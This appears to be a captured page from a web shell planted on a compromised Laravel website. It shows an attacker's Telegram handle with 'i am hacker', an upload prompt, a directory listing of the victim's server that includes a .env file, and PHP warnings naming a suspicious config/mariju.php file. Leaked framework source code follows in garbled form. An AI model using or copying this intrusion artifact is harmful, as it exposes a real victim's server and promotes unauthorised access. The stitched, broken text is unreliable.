telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log19160690 KBJuly 18 2025 20:11:540644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
path = (string) $path; $this->filesystem = $filesystem ?: new Filesystem(); $this->attributes = Collection::make($this->getAttributes()); } /** * Get filesystem. * * @return Filesystem */ public function getFilesystem() { return $this->filesystem; } /** * Set filesystem. * * @param Filesystem $filesystem * * @return $this */ public function setFilesystem(Filesystem $filesystem) { $this->filesystem = $filesystem; return $this; } /** * Get path. * * @return string */ public function getPath() { return $this->path; } /** * Set path. * * @param mixed $path * * @return $this */ public function setPath($path) { $this->path = (string) $path; return $this; } /** * Make new instance. * * @param string $path * @param \Illuminate\Filesystem\Filesystem $filesystem * * @return static */ public static function make($path, Filesystem $filesystem = null) { return new static($path, $filesystem); } /** * Get file content. * * @return string */ public function getContents() { return $this->filesystem->get($this->getPath()); } /** * Decode contents as array. * * @return array * @throws InvalidJsonException */ public function decodeContents() { $attributes = json_decode($this->getContents(), 1); // any JSON parsing errors should throw an exception if (json_last_error() > 0) { throw new InvalidJsonException('Error processing file: ' . $this->getPath() . '. Error: ' . json_last_error_msg()); } return $attributes; } /** * Get file contents as array, either from the cache or from * the json content file if the cache is disabled. * @return array * @throws \Exception */ public function getAttributes() { if (config('modules.cache.enabled') === false) { return $this->decodeContents(); } return app('cache')->store(config('modules.cache.driver'))->remember($this->getPath(), config('modules.cache.lifetime'), function () { return $this->decodeContents(); }); } /** * Convert the given array data to pretty json. * * @param array $data * * @return string */ public function toJsonPretty(array $data = null) { return json_encode($data ?: $this->attributes, JSON_PRETTY_PRINT); } /** * Update json contents from array data. * * @param array $data * * @return bool */ public function update(array $data) { $this->attributes = new Collection(array_merge($this->attributes->toArray(), $data)); return $this->save(); } /** * Set a specific key & value. * * @param string $key * @param mixed $value * * @return $this */ public function set($key, $value) { $this->attributes->offsetSet($key, $value); return $this; } /** * Save the current attributes array to the file storage. * * @return bool */ public function save() { return $this->filesystem->put($this->getPath(), $this->toJsonPretty()); } /** * Handle magic method __get. * * @param string $key * * @return mixed */ public function __get($key) { return $this->get($key); } /** * Get the specified attribute from json file. * * @param $key * @param null $default * * @return mixed */ public function get($key, $default = null) { return $this->attributes->get($key, $default); } /** * Handle call to __call method. * * @param string $method * @param array $arguments * * @return mixed */ public function __call($method, $arguments = []) { if (method_exists($this, $method)) { return call_user_func_array([$this, $method], $arguments); } return call_user_func_array([$this->attributes, $method], $arguments); } /** * Handle call to __toString method. * * @return string */ public function __toString() { return $this->getContents(); } }